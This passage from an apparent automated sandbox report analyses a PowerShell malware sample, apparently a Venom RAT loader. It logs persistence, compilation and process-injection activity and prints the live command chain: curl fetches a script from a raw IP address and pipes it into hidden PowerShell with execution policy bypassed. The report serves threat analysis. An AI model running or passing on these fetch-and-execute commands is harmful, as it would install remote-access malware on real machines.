LpxtNUETkBw5brsGXQlZtJoFz4VoH8f8l29IJxzP0TkremFbc1JQ8c5pX8oLxOTrXdlNDvsc4JvdsFr9s7DcpWS/HQvU8na9hNr6kIR7oUqIyfxIBOZF1f488FRG3ra2zAPmjIo7V1ntYBaIVsEZUZkrNU0jPPYSTSG4TWKt9BOjB4to7sIT+5SttIXYprI2dcYTeaiWa331lEKKv9kwWNPz/5ZKbKG53ZnS/bwB3xobRS3H7e2P3nZo93PwwH+/0YiJlJD0EulS4ewiytZQcvKtlaXsMoH0AMwAQYEnVZ0CgMJxp9JrkvsMK+HGnP5xb4HcnTfIKpJ3JnUmwyEcVgFzodnVz4P1d4jVwjGp6ZcBVdFMf8Gc4vDlmX7CdnVl+Mojdb3jaSJ412rMYGGc7bFdYIhe2PDUklhTXHyU4Y8fgHAzViUPnYGN5lWOec0gqf27qQGVZgcnMUVFi/040anqgw1N33w83v8KwPWjvM4wFVFexNVSU90C4Zi0oxyp8cvdhoGXC1byVWTqxH/s066RUM5H2VKw3pCqwA8G0WW3/7/+IfiTsIjFzKMyBCmUKqD
            Source: 4.2.powershell.exe.277c5770000.13.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 03bjtjx4.dll.6.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@16/18@0/2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.urlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\FkwbxYcgg1G0FnF/TAjQzi9jUa9qcKKioTum8hnjwFlv/+1VfkEHx8BfkllXkWd9Y+CD9XIOkxhhblHpQPtD1w==
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebpmv2vv.nk1.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: trwsfg.ps1Virustotal: Detection: 11%
            Source: trwsfg.ps1ReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3454.tmp" "c:\Users\user\AppData\Local\Temp\03bjtjx4\CSCBF3C1B7A512F4AE098C09161EC8504E.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3454.tmp" "c:\Users\user\AppData\Local\Temp\03bjtjx4\CSCBF3C1B7A512F4AE098C09161EC8504E.TMP"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devenum.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msdmo.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mmdevapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000004.00000002.1883771714.00000277C5514000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\System.Core.pdb source: powershell.exe, 00000004.00000002.1882807571.00000277C5156000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 4.pdb source: powershell.exe, 00000004.00000002.1883771714.00000277C5549000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.pdbhPu source: powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.pdb source: powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBt source: powershell.exe, 00000004.00000002.1883771714.00000277C54D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1883771714.00000277C5514000.00000004.00000020.00020000.00000000.sdmp
